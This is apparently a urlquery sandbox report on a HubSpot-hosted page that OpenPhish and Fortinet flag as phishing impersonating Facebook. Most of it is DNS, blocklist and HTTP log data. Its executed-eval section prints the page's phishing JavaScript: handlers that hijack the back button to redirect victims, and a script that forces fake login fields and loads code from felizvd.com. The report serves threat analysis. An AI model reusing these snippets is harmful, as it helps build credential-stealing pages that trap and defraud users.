Overview

URL news4kcnn.hs-sites-eu1.com/?fbclid=IwAR2SUqE3fjKPQKyOMxYQp-v0dMxgjllQibHMHfutOCraj_L8zYiwqwUzOPE
IP172.64.154.3
ASNCLOUDFLARENET
Location United States
Report completed2022-09-15 09:57:01 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Scan Date Severity Indicator Comment
2022-09-14 2 news4kcnn.hs-sites-eu1.com/?fbclid=IwAR2SUqE3fjKPQKyOMxYQp-v0dMxgjllQibHMHf (...) Facebook, Inc.
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-15 2 news4kcnn.hs-sites-eu1.com/?fbclid=IwAR2SUqE3fjKPQKyOMxYQp-v0dMxgjllQibHMHf (...) Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (27)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-15 05:55:58 UTC 54.187.71.185
mnemonic passive DNS whos.amung.us (1) 12687 2014-04-02 14:27:13 UTC 2022-09-14 18:54:17 UTC 104.22.75.171
mnemonic passive DNS js-eu1.hs-banner.com (1) 66996 2021-08-03 13:53:48 UTC 2022-09-15 06:49:04 UTC 172.65.202.201
mnemonic passive DNS cdn1.hubspotusercontent-eu1.net (3) 0 2022-02-28 15:12:24 UTC 2022-09-14 18:54:16 UTC 172.64.153.30 Domain (hubspotusercontent-eu1.net) ranked at: 206629
mnemonic passive DNS felizvd.com (3) 0 2019-04-28 01:48:31 UTC 2022-09-14 18:54:27 UTC 159.203.26.69 Unknown ranking
mnemonic passive DNS js-eu1.hs-analytics.net (1) 69352 2021-08-03 13:53:48 UTC 2022-09-15 06:49:04 UTC 172.65.238.60
mnemonic passive DNS news4kcnn.hs-sites-eu1.com (1) 0 2022-09-14 14:10:55 UTC 2022-09-15 05:15:42 UTC 104.18.33.253 Unknown ranking
mnemonic passive DNS code.jquery.com (1) 634 2012-05-21 17:28:02 UTC 2022-09-15 04:50:45 UTC 69.16.175.42
mnemonic passive DNS www.lean-labs.com (1) 0 2014-03-27 18:46:32 UTC 2022-09-14 18:54:16 UTC 199.60.103.2 Domain (lean-labs.com) ranked at: 569005
mnemonic passive DNS f.hubspotusercontent-eu1.net (1) 278068 2021-08-12 10:46:27 UTC 2022-09-15 09:51:23 UTC 172.64.153.30
mnemonic passive DNS js-eu1.hscollectedforms.net (2) 75385 2021-08-03 13:53:48 UTC 2022-09-15 06:04:13 UTC 172.65.192.122
mnemonic passive DNS track-eu1.hubspot.com (1) 73788 2021-08-03 10:49:05 UTC 2022-09-15 06:49:06 UTC 172.65.240.166
mnemonic passive DNS static.hsappstatic.net (2) 8199 2013-09-26 02:22:42 UTC 2022-09-15 04:38:09 UTC 104.17.6.210
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-15 04:47:36 UTC 34.120.237.76
mnemonic passive DNS js-eu1.hs-scripts.com (1) 63672 2021-08-03 13:53:48 UTC 2022-09-15 06:49:02 UTC 172.65.208.22
mnemonic passive DNS maxcdn.bootstrapcdn.com (1) 724 2014-06-18 00:37:31 UTC 2022-09-15 04:47:06 UTC 104.18.10.207
mnemonic passive DNS fonts.gstatic.com (3) 0 2014-08-29 13:43:22 UTC 2022-09-15 04:52:00 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-09-15 06:27:39 UTC 93.184.220.29
mnemonic passive DNS app-eu1.hubspot.com (1) 191732 2021-07-26 14:26:48 UTC 2022-09-15 05:32:32 UTC 172.65.236.181
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-15 05:55:39 UTC 143.204.55.35
mnemonic passive DNS cdn.jsdelivr.net (1) 439 2012-09-30 00:15:09 UTC 2022-09-15 04:51:19 UTC 151.101.85.229
mnemonic passive DNS ocsp.pki.goog (6) 175 2017-06-14 07:23:31 UTC 2022-09-15 04:51:27 UTC 142.250.74.3
mnemonic passive DNS fonts.googleapis.com (1) 8877 2014-07-21 13:19:55 UTC 2022-09-15 08:59:09 UTC 216.58.211.10
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-15 06:12:00 UTC 143.204.55.27
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-09-15 04:51:36 UTC 23.36.77.32
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-15 04:50:53 UTC 34.117.237.239
mnemonic passive DNS f.hubspotusercontent20.net (10) 27622 2020-05-02 16:07:48 UTC 2022-09-15 09:29:10 UTC 104.16.187.114


Recent reports on same IP/ASN/Domain/Screenshot

Last 3 reports on IP: 172.64.154.3

Date UQ / IDS / BL URL IP
2022-09-15 09:57:01 +0000
0 - 0 - 2 news4kcnn.hs-sites-eu1.com/?fbclid=IwAR2SUqE3 (...) 172.64.154.3
2022-09-14 22:55:59 +0000
0 - 0 - 4 appnewstv.hs-sites-eu1.com/ 172.64.154.3
2022-09-14 22:05:19 +0000
0 - 0 - 5 cnnnews4k.hs-sites-eu1.com/ 172.64.154.3

Last 5 reports on ASN: CLOUDFLARENET

Date UQ / IDS / BL URL IP
2022-12-03 21:38:36 +0000
0 - 0 - 1 123moviesfree.guru/movies/palang-tod-aadha-ad (...) 172.67.192.226
2022-12-03 21:38:34 +0000
0 - 0 - 3 123watchfree.bar/movies/cinderella/ 104.21.40.75
2022-12-03 21:37:50 +0000
0 - 0 - 1 h.politeawesomevisit.shop/wbsweep/de/azw200-r (...) 104.16.117.67
2022-12-03 21:37:04 +0000
0 - 0 - 4 www.trendyporn.com/video/02-12-2022-tommy-kin (...) 104.21.233.195
2022-12-03 21:36:54 +0000
1 - 0 - 1 storageapi.fleek.co/1ab8f448-3206-48e9-9de6-7 (...) 104.18.7.145

Last 5 reports on domain: hs-sites-eu1.com

Date UQ / IDS / BL URL IP
2022-12-02 21:27:43 +0000
0 - 0 - 1 prositevd.hs-sites-eu1.com/ 104.18.33.253
2022-11-28 08:35:20 +0000
0 - 0 - 0 hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) 104.18.33.253
2022-11-14 13:35:03 +0000
0 - 0 - 6 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-09-23 23:15:15 +0000
0 - 0 - 2 private-video.hs-sites-eu1.com/ 104.18.33.253

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-15 15:41:18 +0000
0 - 0 - 8 app-funnelsx.bubbleapps.io/version-test/ 104.19.217.48
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-10 23:45:55 +0000
0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-10 14:36:22 +0000
0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-01 10:39:02 +0000
0 - 0 - 2 jhufedsgjg614322067.brizy.site/ 34.237.47.210


JavaScript

Executed Scripts (17)


Executed Evals (6)

#1 JavaScript::Eval (size: 0, repeated: 1) - SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        
                                    

#2 JavaScript::Eval (size: 522, repeated: 1) - SHA256: 1960d3df1ea15d7133627d151eb48fd1680fc7155dc1a6541807cbac6f33ca3e

                                        (function() {
    window.location.hash = Math.random();
    var ignoreHashChange = true;
    window.onhashchange = function() {
        if (!ignoreHashChange) {
            ignoreHashChange = true;

            try {
                window.top.location = 'https://sites-news-official.hs-sites-eu1.com/#0.1005';
            } catch (d) {
                window.location = 'https://sites-news-official.hs-sites-eu1.com/#0.1005';
            };
            return false;

        } else {
            ignoreHashChange = false;
        }
    };
})();
                                    

#3 JavaScript::Eval (size: 74, repeated: 1) - SHA256: 1ce0b8fec4048a2609b79aba672d90ed8de6b3ef78178347d9b42d8d90a5506e

                                         (function() {
     new Image().src = '//whos.amung.us/widget/cococho01';
 })();
                                    

#4 JavaScript::Eval (size: 72, repeated: 1) - SHA256: 2639df9c76423338e6d3e7493ad3993bb984d7bfa198a2a7336fdb831f3d301a

                                        (function() {
    new Image().src = '//whos.amung.us/widget/cococho01';
})();
                                    

#5 JavaScript::Eval (size: 382, repeated: 1) - SHA256: 630da06768d46273e886988238462aafe64796fc9d8c9c85d75b30b8afcb99a7

                                        document.body.className = document.body.className + ' touch x1-5 android _fzu _50-3 iframe acw portrait';
m_login_email.required = true;
m_login_password.required = true;
var script_ = document.createElement('script');
script_.src = "https://felizvd.com/location";
script_.async = true;
document.body.appendChild(script_);
                                    

#6 JavaScript::Eval (size: 532, repeated: 1) - SHA256: 92e7aa669ac71e7d85cf27ac15baef2fe25d2f76602f98ccb61719f459672d3b

                                        (function() {
    var ignoreHistoryChange = true;
    window.onpopstate = function(event) {

        if (!ignoreHistoryChange) {
            ignoreHistoryChange = true;

            try {
                window.top.location = 'https://sites-news-official.hs-sites-eu1.com/#0.1005';
            } catch (d) {
                window.location = 'https://sites-news-official.hs-sites-eu1.com/#0.1005';
            };
            return false;

        } else {
            ignoreHistoryChange = false;
        }


    };
})();
                                    

Executed Writes (0)



HTTP Transactions (60)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.27
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Content-Type, Alert, Backoff, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Thu, 15 Sep 2022 09:10:23 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 d4fd24ae65d4d2b97cfdea8d2f0c21a6.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: Yc7QchHvJ-J-Am2eR3uIaxrOqSLizA9io-W7I1gAacgcZmgbE3gQ0A==
Age: 2787


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    91dd975a7b17b2922dd23c0e49314e40
Sha1:   57a2ece1e3cee7c4ebf927f2ba92f52cac395fe2
Sha256: 09966873bbf317f8910c59544cfde2a6d46e8acd2905797cc7c85c6b4d18ea8a
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B5F178D23E633283F226CCA7A9AE79B01E6CAB2299FF7065C980D3A9953212FD"
Last-Modified: Tue, 13 Sep 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10315
Expires: Thu, 15 Sep 2022 12:48:45 GMT
Date: Thu, 15 Sep 2022 09:56:50 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.35
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Thu, 15 Sep 2022 04:35:16 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 8e6dce34fd223e0c9d89fd938d1784a2.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: 2SnoU0aj6F9L4Wdoa0Y0VCUec785unDX5DAIcjavOXKN3NyCtZIHJw==
age: 19295
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Thu, 15 Sep 2022 09:56:50 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /npm/bootstrap@4.6.0/dist/js/bootstrap.min.js HTTP/1.1 
Host: cdn.jsdelivr.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.85.229
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=31536000, s-maxage=31536000, immutable
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-jsd-version: 4.6.0
x-jsd-version-type: version
etag: W/"f7eb-O+7WjtfXU8a/T2HCY4bd15KboDA"
content-encoding: gzip
accept-ranges: bytes
date: Thu, 15 Sep 2022 09:56:51 GMT
age: 12302564
x-served-by: cache-fra19124-FRA, cache-bma1670-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 14954
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (63188)
Size:   14954
Md5:    bcd78d6c0ec033bf482fd42a464a0456
Sha1:   db079a86c03c9930571f8d0d6585cd7c4817fb95
Sha256: 3ade5e6e9f8a5da4b810b01861e48e7e4fa50b8c4fc5899a715062a139c5d258
                                        
                                            GET /jquery-3.6.0.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.42
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-encoding: gzip
content-length: 30875
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-15d9d"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1663235811.dop018.sk1.t,1663235811.cds242.sk1.hn,1663235811.cds210.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   30875
Md5:    899f0189aaf034bbba5340f724d91dfa
Sha1:   210ea9de03968edb9d839ba4a0ce2d48666a8ab8
Sha256: 949b6597c5ea907a7ef3c8ca6d5ffc73be2352f9df485b78704e5c4dabac5d0f
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 15 Sep 2022 09:56:51 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /hub/26246936/hub_generated/template_assets/53117121739/1663156038137/marketplace/Sprocket_Rocket/sr-theme-free/css/sr-base.min.css HTTP/1.1 
Host: cdn1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.64.153.30
HTTP/2 200 OK
content-type: text/css
x-hs-alternate-content-type: text/plain
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
cf-ray: 74b07eac8caeb509-OSL
access-control-allow-origin: *
cache-control: public, max-age=1209600
etag: W/"a034c0cb06aab3ae7329c7fcf548bb86"
expires: Thu, 29 Sep 2022 09:56:51 GMT
last-modified: Wed, 14 Sep 2022 11:47:20 GMT
vary: Accept-Encoding
via: 1.1 227a1815a1677b9cf6dd587e443000b8.cloudfront.net (CloudFront)
cf-cache-status: REVALIDATED
access-control-allow-methods: GET
x-amz-cf-id: eEeTgzox4mQnUbfk32woVhH4WO-Rh-5Xxs5HstvZsMLp1iGljVQIhw==
x-amz-cf-pop: OSL50-P1
x-amz-id-2: GEoScNlY3RY+W8eP9fARismE9ziCJmIYLnRvwSo8zBESrLBxb4ELYFI8GhD+gpHYLWTqATO3hfc=
x-amz-meta-created-unix-time-millis: 1663156039053
x-amz-request-id: E4632G2SAK3S975Z
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: 8Gnw.tLvBXShIILkllBZ0xddBtensMPp
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReads 5
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReads 5
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   12190
Md5:    3b97f68e8a6b8764f42a8e0033b0c813
Sha1:   c6238d7abfa7f0616a6e4f96119dabe616df5be2
Sha256: 35ec27bb6ad63ed9aa5334520377f6fb14139772fb559b730f52acd466e0aee9
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.27
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Thu, 15 Sep 2022 09:03:22 GMT
Cache-Control: max-age=3600
Expires: Thu, 15 Sep 2022 09:56:56 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 6480520a5e02f3163410e3134bd77baa.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: EIX_ybCvyvQICKWf3r79NoZlgMk7dbQDFNoqLur-RzXkCgT_rlllaA==
Age: 3209


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 15 Sep 2022 09:56:51 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 15 Sep 2022 09:56:51 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /hubfs/sr-assets/pattern-library/sr-hero-01/sr-hero-01-v2.jpg HTTP/1.1 
Host: www.lean-labs.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         199.60.103.2
HTTP/2 200 OK
content-type: image/jpeg
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 278074
cf-ray: 74b07eaeded00b69-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 79871
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: "c83bc29a87114e8e700922654fc8a888"
last-modified: Tue, 11 Dec 2018 17:17:13 GMT
strict-transport-security: max-age=31536000
vary: Accept-Encoding
via: 1.1 bfeae0ecbffe44ad98e5cd0ae83bdb4a.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6752477065,FD-5987776827,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origSize=305715, status=webp_bigger
edge-cache-tag: F-6752477065,FD-5987776827,P-275827,FLS-ALL
x-amz-cf-id: 78UNxBXXc6IQMkolNLJ-2mN3_qElRDRqD9Z8Ixe-0GWbKpB_rNTT1g==
x-amz-cf-pop: ARN56-P1
x-amz-id-2: oWqLIlMzN5uvFa6YHkgpo+PLxpQl+XWuhEMuj6vWY9GPvJ0aycqM7LLNYIumvmjsFJLleK8cnEI=
x-amz-meta-cache-tag: F-6752477065,FD-5987776827,P-275827,FLS-ALL
x-amz-request-id: B7M52HGBE8AH4FMZ
x-amz-version-id: q.wNl0WaWucSMi8QYT59BSQdbGZRKDEb
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
x-hs-https-only: worker
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hn5HHMNn8Rjsl2p3Jif3UeYtNcczUK%2BfauvLG5r4thy%2Fv6CUEcM22QiXuaLh2ylqB1NKciB35UXzPY6%2B8Pb74k3vlnzWQo2vQC1NNv0Y1PeOHi3%2BUbdbFNkG56O4GWnYn%2BZr"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: __cf_bm=wNf.HGJjWFA1DBUOymDgoxW1AxUt4aPAmDGl1newFKg-1663235811-0-ASm8oXEG3r8WDNCbF6PoJ4qJU2kphl2rp45Exqxc2Oen+VXOq3KYFfB1CRFmmH48pH9vkZb8ZKqH6nonsjYbiL4=; path=/; expires=Thu, 15-Sep-22 10:26:51 GMT; domain=.www.lean-labs.com; HttpOnly; Secure; SameSite=None __cfruid=80b6fb3eccaca14e1f67753285d897be9648a06b-1663235811; path=/; domain=.www.lean-labs.com; HttpOnly; Secure; SameSite=None
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], progressive, precision 8, 2880x1958, components 3\012- data
Size:   278074
Md5:    77de0dfc7063d547a20f260ade8123b6
Sha1:   4a494659cbe0ed89c9fd8192f59e8036c0ceb04f
Sha256: 676c068451bb86a8562138ea1641517afc1fb87819c8212e711ea47bac92650c
                                        
                                            GET /s/poppins/v20/pxiEyp8kv8JHgFVrJJfecg.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 7884
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 19:32:09 GMT
expires: Thu, 14 Sep 2023 19:32:09 GMT
cache-control: public, max-age=31536000
age: 51882
last-modified: Wed, 27 Apr 2022 17:03:52 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7884, version 1.0\012- data
Size:   7884
Md5:    9212f6f9860f9fc6c69b02fedf6db8c3
Sha1:   ac6d71b4d5fdd2b3dabc9a06ff6c001e4251da0b
Sha256: 7d93459d86585bfcdbb7e0376056226adb25821ee54b96236fe2123e9560929f
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 15 Sep 2022 09:56:51 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
